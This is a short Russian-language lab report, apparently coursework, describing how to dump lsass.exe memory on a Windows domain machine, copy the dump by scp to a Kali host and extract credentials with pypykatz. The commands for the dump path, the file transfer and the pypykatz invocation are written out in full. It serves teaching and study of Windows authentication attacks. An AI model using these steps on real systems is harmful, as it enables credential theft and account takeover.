###### tags: `Windows` # Отчет по заданиям к практической работе №3 ААА в Windows: ### 1) Проанализировать память процесса lsass.exe + Зайдём под учетной записью Ольги.  + Первичная настройка пользователя системы.  + Обращаемся к ресурсам домена.  + Cменим пользователя на Петра.  + Первичная настройка пользователя системы.  + Запустим командную строку от имени администратора.  + Так как Petr не является администратором PC1, введем данные ADMPetr.  + Введём команду whoami, чтобы проверить, кто мы.  + Теперь запустим диспетчер задач от имени администратора(ADMPetr).  + Откроем подробное представление, перейдём в подробности и найдём процесс lsass.exe.  + Cоздаем дамп через "ПКМ - Создать файл дампа".  + Расположение дампа находится по адресу: >C:\Users\ADMPetr\AppData\Local\Temp\lsass.DMP  + Теперь используем Kali Linux, чтобы включить ssh и передать файл. Откроем консоль и включим root-права. > sudo -i  + Далее зададим нашей машине на Kali Linux статический IP-адрес в нашей локальной сети и тип подключения: "Внутренняя сеть"   + Включаем сервис SSH.  + Вернёмся в Win10 и передадим файл на Kali-машину. > scp C:\Users\ADMpetr\AppData\Local\Temp\lsass.DMP ptvadim@192.168.10.9:/home/ptvadim  + Файл передан.  + Cкачаем скрипт pypykatz в директорию /home/ptvadim. Для этого вернем тип подключения NAT, а также конфиг настройки соединения в самом Kali. И склонируем репозиторий с Github. > git clone https://github.com/skelsec/pypykatz    + Перейдём в директорию pypycatz и выполним скрипт, применив его к скачанному ранее дампу. > pypykatz lsa minidump /home/ptvadim/lsass.DMP  + Увидим учетные данные, которые скрипт достал из процесса lsass.